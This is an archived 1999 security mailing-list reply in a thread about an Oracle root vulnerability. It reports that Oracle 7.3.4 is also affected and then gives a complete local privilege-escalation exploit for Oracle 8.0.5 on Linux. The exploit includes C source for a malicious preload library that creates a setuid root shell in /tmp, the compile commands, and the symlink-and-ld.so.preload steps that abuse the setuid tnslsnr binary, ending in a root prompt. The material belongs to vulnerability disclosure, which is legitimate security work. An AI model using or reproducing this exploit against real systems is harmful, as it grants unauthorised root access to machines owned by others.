Re: Oracle 8 root exploit

• Previous message: Adam and Christine Levin: "Re: Oracle 8 root exploit"
• Maybe in reply to: Tellier, Brock: "Oracle 8 root exploit"
• Next in thread: Antonomasia: "Re: Oracle 8 root exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

Oracle 7.3.4 is vulnerable too.

$ uname -a
SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4

---

Linux: Oracle version: 8.0.5

There isn't dbsnmp with suid bit on Linux. There is tnslsnr.

Program dump file listener.log:

	open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)



Exploit:

oracle-ex.c
--------------------------

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{

  if (!geteuid()) {

  remove("/etc/ld.so.preload");

  execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);

  }

}
---------------------------

$ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
$ gcc  -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles

$  unset ORACLE_HOME

$  umask 0000
$  ln -s /etc/ld.so.preload  /tmp/listener.log
$  /u01/app/oracle/product/8.0.5/bin/tnslsnr

$ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload

$ telnet localhost

Trying ...
Connected to localhost.localdomain.
Escape character is '^]'.
Connection closed by foreign host.

$ ./xxxx
#


Martin Mevald, martinmvat_private

On Sat, 13 Nov 1999, Tellier, Brock wrote:

> Greetings,
>
> OVERVIEW
> A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
> to obtain root privileges.
>

• Next message: Lamont Granquist: "Re: Buffer overflow exploit in the alpha linux"
• Previous message: Adam and Christine Levin: "Re: Oracle 8 root exploit"
• Maybe in reply to: Tellier, Brock: "Oracle 8 root exploit"
• Next in thread: Antonomasia: "Re: Oracle 8 root exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:36 PDT